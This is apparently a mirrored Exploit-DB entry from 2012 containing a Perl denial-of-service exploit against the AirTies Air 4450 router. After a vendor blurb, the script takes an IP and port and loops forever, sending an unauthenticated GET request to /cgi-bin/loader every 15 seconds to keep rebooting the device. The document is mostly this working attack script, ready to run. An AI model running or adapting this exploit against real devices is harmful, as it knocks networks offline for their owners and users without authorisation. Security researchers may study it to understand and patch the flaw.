AirTies-4450 – Unauthorized Remote Reboot (Denial of Service)

  • 作者: rigan
    日期: 2012-01-08
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/18336/
  • #!/usr/bin/perl
    #
    # Title: AirTies-4450 Unauthorized Remote Reboot [DoS].
    # Type: hardware
    # Tested on firmware: AirTies_Air4450_RU_FW_1.1.2.18.bin
    # 
    # Author: rigan - imrigan [sobachka] gmail.com
    #
    # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
    # 
    # The description of the device from a site of the vendor:
    #
    # With its Access Point and Router functionality, the Air 4450 provides wireless Internet access over 
    # ADSL and Cable modems. Air 4450 uses 802.11n technology providing wireless data transfer
    # rates of up to 300 Mbps. Thus, you can transfer data, watch videos or upload your pictures to the 
    # Internet at “N-speed”. Providing 6 times faster wireless communications compared to earlier 
    # technologies, and 4 times greater wireless range through use of MIMO technology*, Air 4450 has
    # been developed to meet all your wireless needs.
    # 
    # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
    # 
    # The vulnerability:
    # 
    # http://192.168.1.1/cgi-bin/loader - This cgi script allows to reboot the device via GET request.
    # 
    # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
    use LWP::Simple;
    print "[*] AirTies Air-4450 Remote Dos Exploit\n";
    if (@ARGV != 2){
     print "[*] Usage: perl airdos.pl ip port \n";
     exit(1); 
    }
    while (@ARGV > 0){
     $ip = shift(@ARGV);
     $port = shift(@ARGV);
    }
    $url = "http://".$ip.":".$port."/cgi-bin/".loader;
    print "[*] DoS ...............................\n";
    while(1){
    get($url);
    sleep(15);
    }